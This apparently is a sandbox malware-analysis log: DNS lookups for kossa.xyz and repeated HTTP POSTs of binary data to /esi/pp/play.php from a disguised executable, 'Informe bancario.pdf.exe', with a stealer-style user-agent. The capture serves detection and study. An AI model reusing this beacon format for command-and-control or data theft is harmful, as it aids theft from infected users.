Jun 23, 2022 17:55:16.508002996 CEST	8.8.8.8	192.168.2.3	0x2e94	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:16.508002996 CEST	8.8.8.8	192.168.2.3	0x2e94	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:18.899779081 CEST	8.8.8.8	192.168.2.3	0x255e	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:18.899779081 CEST	8.8.8.8	192.168.2.3	0x255e	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:20.869082928 CEST	8.8.8.8	192.168.2.3	0xde93	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:20.869082928 CEST	8.8.8.8	192.168.2.3	0xde93	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:22.262568951 CEST	8.8.8.8	192.168.2.3	0x9f80	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:22.262568951 CEST	8.8.8.8	192.168.2.3	0x9f80	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:26.293586969 CEST	8.8.8.8	192.168.2.3	0xa552	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:26.293586969 CEST	8.8.8.8	192.168.2.3	0xa552	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:33.503941059 CEST	8.8.8.8	192.168.2.3	0xf39	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:33.503941059 CEST	8.8.8.8	192.168.2.3	0xf39	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:36.578289032 CEST	8.8.8.8	192.168.2.3	0xfb89	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:36.578289032 CEST	8.8.8.8	192.168.2.3	0xfb89	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:40.590874910 CEST	8.8.8.8	192.168.2.3	0x7f71	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:40.590874910 CEST	8.8.8.8	192.168.2.3	0x7f71	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:42.254795074 CEST	8.8.8.8	192.168.2.3	0x2bfc	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:42.254795074 CEST	8.8.8.8	192.168.2.3	0x2bfc	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:45.739217043 CEST	8.8.8.8	192.168.2.3	0xc204	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:45.739217043 CEST	8.8.8.8	192.168.2.3	0xc204	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:50.511487961 CEST	8.8.8.8	192.168.2.3	0x473a	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:50.511487961 CEST	8.8.8.8	192.168.2.3	0x473a	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:53.386226892 CEST	8.8.8.8	192.168.2.3	0xfec	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:53.386226892 CEST	8.8.8.8	192.168.2.3	0xfec	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:55.552799940 CEST	8.8.8.8	192.168.2.3	0x9e3f	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:55.552799940 CEST	8.8.8.8	192.168.2.3	0x9e3f	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:58.114485025 CEST	8.8.8.8	192.168.2.3	0x11e3	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:55:58.114485025 CEST	8.8.8.8	192.168.2.3	0x11e3	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:00.529114008 CEST	8.8.8.8	192.168.2.3	0x29be	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:00.529114008 CEST	8.8.8.8	192.168.2.3	0x29be	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:02.063860893 CEST	8.8.8.8	192.168.2.3	0xfd3	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:02.063860893 CEST	8.8.8.8	192.168.2.3	0xfd3	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:04.160404921 CEST	8.8.8.8	192.168.2.3	0x29c8	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:04.160404921 CEST	8.8.8.8	192.168.2.3	0x29c8	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:08.618109941 CEST	8.8.8.8	192.168.2.3	0xd3b9	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:08.618109941 CEST	8.8.8.8	192.168.2.3	0xd3b9	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:11.050276995 CEST	8.8.8.8	192.168.2.3	0x3c9e	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:11.050276995 CEST	8.8.8.8	192.168.2.3	0x3c9e	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:13.752243996 CEST	8.8.8.8	192.168.2.3	0x2c4c	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:13.752243996 CEST	8.8.8.8	192.168.2.3	0x2c4c	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:16.868690968 CEST	8.8.8.8	192.168.2.3	0xcebe	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:16.868690968 CEST	8.8.8.8	192.168.2.3	0xcebe	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:19.772675037 CEST	8.8.8.8	192.168.2.3	0xf3b6	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:19.772675037 CEST	8.8.8.8	192.168.2.3	0xf3b6	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:20.735198021 CEST	8.8.8.8	192.168.2.3	0x7fc1	No error (0)	kossa.xyz	104.21.40.153	A (IP address)	IN (0x0001)
Jun 23, 2022 17:56:20.735198021 CEST	8.8.8.8	192.168.2.3	0x7fc1	No error (0)	kossa.xyz	172.67.154.72	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

kossa.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49741	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:33.910152912 CEST	1145	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 190 Connection: close
Jun 23, 2022 17:54:34.295411110 CEST	1146	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2F3%2FYGTqLRrwVxRYD5V6o8dLFQPAl70RKKELnXHzwiFsIH2XD55%2F8HTU0BtJrL1Zc0%2BqzyVQYKfoLsSi1rv5TON5EVTpte0zWNjM9a5ORZnqM1owuJ8kheCb5R4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe6729ff697711-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49742	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:35.573404074 CEST	1147	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 190 Connection: close
Jun 23, 2022 17:54:35.979684114 CEST	1148	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vInpdW2j2t0TkXgNWrVbBrhz59C5ZUZepr6EXNkEDlN5Mmpr3I3XN9MXchA%2FuUuBCNvin54PKkEVjvkFMD1mUTaTWJDjljOyWMNNY2gG90YnT13wAFVp5IWO%2BbU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe6734694506b6-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49765	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:54.716737032 CEST	1333	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:55.074867964 CEST	1334	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0akr324rj22v7XL1BzRlbcaOgwhIsL47D88GVXY%2FxOflrdVv9CvEO4yeF8f9FJu3D%2B6Y7sLCT%2BeCECm2KJKeJ%2B7ErMUaz8ZvLbAsEZPVjHkh3byzhQxA4ywMTYk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67ac08e59b4c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49766	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:56.372364044 CEST	1335	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:56.739352942 CEST	1336	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2ByevUGMGsZ111zCdJS74X4XYDvx6eVZ3i%2F5VUEP17FJNs3Bqe8Qn0vElJjRGqHAY7uRrku1Pn%2FjCwHkZuCcO%2F57fHu0HPl8zmRUlYlJb33Oa25zNF9kqh6%2FNuew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67b658a89b8c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49767	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:57.914899111 CEST	1338	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:58.307390928 CEST	1339	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kwfBO1rarCMHF33sDfc%2FZKo%2FIgtM77dHh4KfHrltf1yF4wOBGBcPdtPYk7Gne4ienNeRTkl01aZxPHrTI9mJKW6071l4b0ziZbDzmI6omQQuIRxDJR5b361HK7g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67c009327562-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49768	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:59.413778067 CEST	1340	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:59.812854052 CEST	1341	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xqhVjfx2p8PTpn4tczArStndPzakgSs%2BTWI7UJE786K6XBIJeBhOXQHsjNJk26JEngnxLLixd5ZrVVrb8Tu6D0EaWH0pbbBSZ1yLO8LXPRRQZoxw97K2w%2F9d7so%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67c96fb24057-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49769	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:00.833023071 CEST	1341	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:01.207211018 CEST	1342	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5Tz5JLO2MblLMyr4APXVpxgxfK%2B0Kc3BOQhOBhwPUsguvgSrEuQlc5mh%2B9pPj8KhG7kVF7cHtszSFE%2BtD9Yahsoh%2BPGlGVRZRdCImmWU%2FfiCDnsGX2p9GMZTsY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67d2489376ef-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49770	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:02.423254013 CEST	1343	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:02.800951004 CEST	1344	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=31Nszk1CWYSA9SOTTjk0axXRKvLvR16xBtz06oEJk7GyK9ZiBFLDPgs20nYRt%2BvKchXumr41xrIC6OwbUn7QZAfWFpu5HQjcSbXgMxSyKeSe0hICexexAPmqGmg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67dc3ac9892a-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49771	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:04.009922981 CEST	1345	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:04.389384031 CEST	1346	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jD6t2rHYuFn4FYzzNqjS8CselpLY%2Bjq1MHBr90Vx4i7IUWEUXUU3OlA90SCJ8Kl8IXVW3L9Jqh0BJ08Xwi2NYeqrBfylpgnGn0wKRBrj36qHUAfUmIVPg7XMvA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67e618697755-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49772	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:07.425069094 CEST	1347	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:07.799252033 CEST	1348	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q9GKeM1DCUCNDkWTJI7si91%2FhYmrJiPTzKgnLGatICAm8LrANgt7XyJMgX0Jd8iievc76jPbBHYpgRq%2Fls3LOEKozRxm5HYpLHZPqlwA7h7XdYOvcniRwnEiPWQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67fb786b8880-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49773	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:09.049678087 CEST	1349	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:09.424262047 CEST	1350	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bXMiJPIEoEUFdZzsgRFS8od9XNPKBPK1z7aPFcyn%2FA1ugjwdbtZzB%2BjRKLn%2BXSyWHJukQDQmqihBZ2YI7wjIzshUJaoxfhPtVMIDNZZcS9rYM1PWfoAX6UFsbg0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe680598247780-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49774	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:10.726793051 CEST	1351	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:11.087935925 CEST	1352	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FWEWYXk0vBaU2bjp48BtaQpQ3Ggqrm2QHzlEz3cjpBMCny1jbHhv9KIfMDvY7rdMAVGfKU%2FL6ctWgUmBIcCFV68Sb9CTOymCfgRyTXasPXTE76iKGKqAv5qCMAU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68101b8b9be8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49743	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:37.108829975 CEST	1149	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:37.484196901 CEST	1150	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7V5Gc3atXU%2F7rltrm12KGvbycRYFCgLiJibtU08Is1x6vGrWm%2FIN9lvKLV2xmFkSfDE5rh4%2Fv1K4HHvGipuCkiTMbAUFNj04N3yK7qCmAv2YMqNtVqxcv%2Fzmb0Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe673df81e8895-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49775	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:12.061012030 CEST	1352	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:12.409252882 CEST	1353	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w3W%2FUBL%2FSDBMtNUJBmJhMrWUvmbl3m9w2mVNi%2BJDP21FEOSP848VAvgSKP36DL2w0TklzdIt%2FWhOKAlXmqx%2BuscdBRUNfp46FBktKwDFwm5qu0ArkTMXp%2BiHWGo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe6818698a9001-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49776	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:13.438858986 CEST	1354	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:13.814687014 CEST	1355	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JYmA19OcduyPB68nR4yg5R2zInSuuGr81RqiNbiBmJyM8NTQIqVdnKCsXggdgPI9IJQ639Skfc1Xaxz4PkdOsUR9ZWjgTE7x5SeIRsETBiIqx0Y7KYLktWZztss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe682109b99a3c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49778	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:15.087770939 CEST	1357	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
